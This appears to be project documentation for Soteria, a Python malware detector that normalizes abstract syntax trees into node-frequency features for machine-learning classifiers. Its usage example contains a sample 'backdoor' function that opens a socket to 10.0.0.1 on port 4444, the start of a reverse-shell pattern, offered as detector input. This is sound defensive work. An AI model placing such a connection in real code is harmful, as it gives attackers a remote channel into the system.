Structural DNA & AST Normalization
Soteria’s detection engine is built on the philosophy that malicious behavior remains consistent in its structure, even when its appearance is obfuscated. To achieve this, the system moves beyond string-based pattern matching and instead analyzes the Abstract Syntax Tree (AST) of Python code to extract what we call "Structural DNA."
The Normalization Engine
The first step in the pipeline is Structural Normalization. Traditional security scanners can be bypassed by simply renaming variables or changing string literals. Soteria neutralizes this by utilizing a custom AST.NodeTransformer to anonymize the source code.
Anonymization Logic
The codeNormalizer (found in normalizer_AST.py) traverses the code’s syntax tree and replaces specific identifiers while preserving the logic flow. This process ensures that:
- Variable Names: All user-defined variables are mapped to a generic placeholder (e.g.,
var_1). - Constants/Literals: Specific strings and numbers are neutralized to prevent the model from over-fitting on specific IPs or file paths.
- Function Calls: While the structure of the call is preserved, the context is focused on the interaction rather than the naming.
By reducing code to its skeletal structure, the engine becomes resistant to "Variable Renaming" and "Comment Injection" obfuscation techniques.
Structural DNA Extraction
Once a function is normalized, it is converted into a numerical feature matrix—the Structural DNA. This matrix represents the frequency and distribution of specific Python AST nodes.
Feature Mapping
The system tracks the occurrence of various node types, including but not limited to:
Assign: Variable assignments.Call: Function or method invocations.BinOp: Binary operations (e.g., addition, bitwise shifts).Attribute: Accessing object attributes (often used in malicious library imports).Import/ImportFrom: External dependency declarations.
The Feature Matrix
This data is aggregated into a numericFeatures.csv file, which serves as the primary training input for the ML models.
| Node Type | Purpose in Detection |
| :--- | :--- |
| Call | High density often indicates shell execution or socket communication. |
| Attribute | Frequent attribute access (e.g., os.system) signals deep system interaction. |
| BinOp | Can indicate payload decryption or obfuscated string reconstruction. |
The Data Pipeline
The dataPipeline_AST.py module manages the lifecycle of code analysis. It ensures data purity and prepares functions for either training or real-time inference.
1. Function-Level Granularity
Soteria does not analyze files as monolithic blocks. Instead, it parses the file into an AST, identifies all FunctionDef nodes, and extracts them individually. This allows the system to pinpoint exactly which function within a large script contains malicious logic.
2. Hardened Deduplication
To prevent dataset bias, the pipeline utilizes SHA-256 hashing. Before a function is added to the training set or scanned, its raw logic is hashed:
def get_Code_Hash(codeText):
"""
Generates a unique fingerprint to detect and skip
duplicate functions in the dataset.
"""
return sha256(codeText.encode('utf-8')).hexdigest()
3. Integration with Machine Learning
The normalized AST data flows into a multi-stage model architecture:
- Ensemble Classifier: Combines Random Forest and Gradient Boosting to analyze node distributions.
- Neural Network: A PyTorch-based deep learning model (
VulnerabilityNet) that identifies complex, non-linear relationships between AST nodes. - Hybrid Stacking: The final decision engine that weights the outputs of both the structure-based ensemble and the neural feature extractor.
Usage Example
To process code through the normalization pipeline programmatically:
import ast
from normalizer_AST import codeNormalizer
# Sample malicious snippet
raw_code = """
def backdoor():
s = socket.socket()
s.connect(("10.0.0.1", 4444))
"""
# Parse and Normalize
tree = ast.parse(raw_code)
normalizer = codeNormalizer()
normalized_tree = normalizer.visit(tree)
# Convert back to code for inspection
clean_logic = ast.unparse(normalized_tree)
print(clean_logic)
# Output will show generic variable names but preserved 'socket' calls.
By focusing on the AST rather than the Source Text, Soteria identifies the inherent "shape" of an attack, providing a robust layer of defense that evolves alongside new obfuscation methods.